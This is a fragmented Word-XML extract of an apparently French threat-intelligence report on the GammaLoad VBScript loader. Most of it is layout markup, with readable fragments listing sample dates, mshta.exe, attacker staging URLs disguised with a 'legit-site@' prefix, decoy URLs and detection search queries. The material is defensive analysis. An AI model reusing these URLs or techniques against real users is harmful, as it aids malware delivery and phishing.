            <wp:docPr id="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7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4576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2333625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="695684" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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présumée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5600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1520455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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https://rg.com@iiwdsxwamylbwwsoyrmj.supabase.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66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1520455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8e45de593bb100f7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7648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1696985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9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co/functions/v1/clever-responder/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86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1696985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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32d642d78db6ac1e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9696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1873515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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KokonGoogle_09.12.2025/strictly/sportsman.pdf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1873515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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517b55b50a59cf44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1744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2227845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803687" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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mshta.exe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27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2227845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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29849d86f50c01fc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3792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2404375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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https://documentation.ftjph87563.workers.dev/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48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2404375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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86d44ea5886a43d2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5840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2500018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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02/01/2026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68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2580905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8604544596331c06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7888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2580905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7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UkrNet_02.01.2026/cutting/dd/mm/2026/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89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2757435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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12142261f8c1b5db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9936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2757435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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hannah13196.pdf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3111765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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f4779667e4b25efa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1984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3111765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803687" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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mshta.exe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3008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3288295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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2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"https://axbghxvgdglpgwfzaqih.supabase.co/fun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40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3288295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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d85bf3b73699221f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5056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3383938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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6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19/12/2025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6080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3464825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3102806" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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28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ctions/v1/smooth-task/Odessa_19.12.2025/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71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3464825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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935bb3377396f25b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8128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3641355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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becoming.pdf"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91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3641355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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2f65e2a0fbafebea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01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3995685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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cb4315c235bbb6ea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0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4083950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803687" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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mshta.exe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22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4172215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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237117ec0f9c9761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3248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4260480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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http://nv.ua@open-files.sytes.net/GPuUkr/exce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4272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4267858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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23/10/2025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52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4348745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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203986297eec145c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6320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4437010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ptione68/sawmOn.pdf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73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4525275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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dd87a79816520e21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83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4879605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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d967f3a32015fde2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9392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4967870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8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2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https://russian.rt.com@competitors-wrestling-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04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5056135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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eb3f75f3a741dfdd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0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5144400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3409588" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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958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equipped-meet.trycloudflare.com/earliestqbZ/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2464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5151778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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09/09/2025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34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5232665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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02e3a9293f4ee4e1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4512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5320930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5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mvs/receiptFLR/physicianmaV.pdf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55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5409195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0eff5c664cc9ef82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65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5763525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0716db7ad22fc3f0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7584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5851790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2186082" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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608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%WINDIR%\system32\mshta.exe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86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5940055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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39848f0bd2ea3b8e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9632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6028320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3486283" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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62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http://regnum.com@dilopendos.serveirc.com?/mo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0656" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2269489</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6035698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734660" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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10/11/2025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6116585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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faa8ad6b2e1ea447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2704" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3126739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6204850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2949416" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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94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ss_10.11.2025/futureHtG/accountc7z.pdf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37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6293115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5631fc6e317d3d2b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4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6615695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874162" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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16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L'échantillon </w:t>
                        </w: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29849d86f50c01fc86d44ea5886a43d28604544596331c0612142261f8c1b5db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5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6798333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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contient également plusieurs URL leurres intégrées en clair dans le code afin de tromper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6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6971688</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1179700" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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97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l'analyse statique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7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7257702</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3541212" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1212" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle40"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://gumm32@twitter.com/deserter/stalls.pdf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8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7401847</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3541212" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1212" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle40"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://corkKQD@www.bbc.com/deeper/invader.pdf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9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7847988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Enfin, plusieurs recherches ont été effectuées afin d'identifier des chaînes de caractères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0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8021343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3733276" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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32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suffisamment spécifiques pour retrouver d'autres variantes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8284080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1270453" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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45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294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8454260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5317232" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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723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content:"https://ovenECw@google.com/functions/v1/dynamic-api/bu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396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8624440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="706573" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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65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sts.pdf"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499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8896220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1186633" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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663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6016" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5488635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8896220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1293618" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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3618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fs:2026-01-01+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7040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9066400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4562852" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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285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content:"documentation.ftjph87563.workers.dev/UkrNet_"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806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9338180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5210552" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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055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84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fs:2026-01-01+ content:"Int((15823 * Rnd) + 1)"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90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011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11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318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3742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854709"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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8547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85470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854709"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="85470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5232" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1388109</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4075427</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4785360" cy="5245747"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="92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 l="-13" r="0" t="-23" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4785360" cy="52457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5360" h="5245747">
                          <a:moveTo>
                            <a:pt x="0" y="5245747"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4785360" y="5245747"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4785360" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="524574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625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728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9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8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9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Ces requêtes n'ont retourné que les échantillons déjà identifiés. L'analyse des chaînes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9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9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des infrastructures observées montre néanmoins l'utilisation de mécanismes de génération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0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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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pseudo-aléatoire pour certaines portions des URLs et des sous-domaines utilisés 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1480843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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l'acteur, compliquant ainsi l'identification de nouveaux échantillons par simple recherche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1654198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1451556" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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155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d'indicateurs statiques.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3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2185702</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3284763" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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4763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41"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.2 </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle22"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">GammaLoad : chargement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4448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2584475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1217341" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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7341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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.2.1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle42"/>
                            <w:spacing w:val="6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2"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1er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 stage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5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2896893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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Dans le cadre de l'analyse, l'équipe TDR de Sekoia a analysé le code VBScript en mémoire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6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3067315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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identifié par le condensat MD5 </w:t>
                        </w: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bf94f4056627907d86ce1cae8b44c67a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, qui peut également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7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3249953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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être considéré comme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. Cette étape est probablement exécutée à partir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8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3423308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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GammaWorm ou de GammaPhish, entièrement en mémoire. Son objectif principal est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9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3596663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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mettre à jour la configuration réseau, d'identifier la victime, de récupérer et d'exécuter l'étape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0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3770018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3008513" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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85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suivante de la charge utile avant de se terminer.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1616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2190115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9297690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3217724" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7724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5 – Première étape du loader initié par un script VBSript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366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46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571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673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02880" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>889000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3346459</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5768975" cy="565784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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8975" cy="5657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8975" h="565784">
                          <a:moveTo>
                            <a:pt x="571500" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1702435" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1702435" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="571500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="571500" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="570864" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="570864" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3693160" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5768975" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5768975" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3693160" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3693160" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1703069" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3692525" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3692525" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1703069" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1703069" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="571500" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1702435" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1702435" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="571500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="571500" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="570864" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="570864" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5657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4928" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2592069</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3346459</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4065905" cy="565784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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5905" cy="5657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5905" h="565784">
                          <a:moveTo>
                            <a:pt x="1990090" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4065905" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4065905" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1990090" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1990090" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1989455" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1989455" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5657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6432" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>885825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3346459</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5775960" cy="4768849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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5960" cy="4768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5960" h="4768849">
                          <a:moveTo>
                            <a:pt x="574675" y="6350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="574675" y="4762500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="4768849"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="4765675"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5775960" y="4765675"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="4241164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="4241164"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="3716655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="3716655"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="3192145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="3192145"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="2667635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="2667635"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="2143124"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="2143124"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="1618615"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="1618615"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="1094105"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="1094105"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6349" y="569595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5769610" y="569595"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="577596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7456" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2592069</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3352809</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4756149"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9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756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756149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="47561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8480" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4582160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
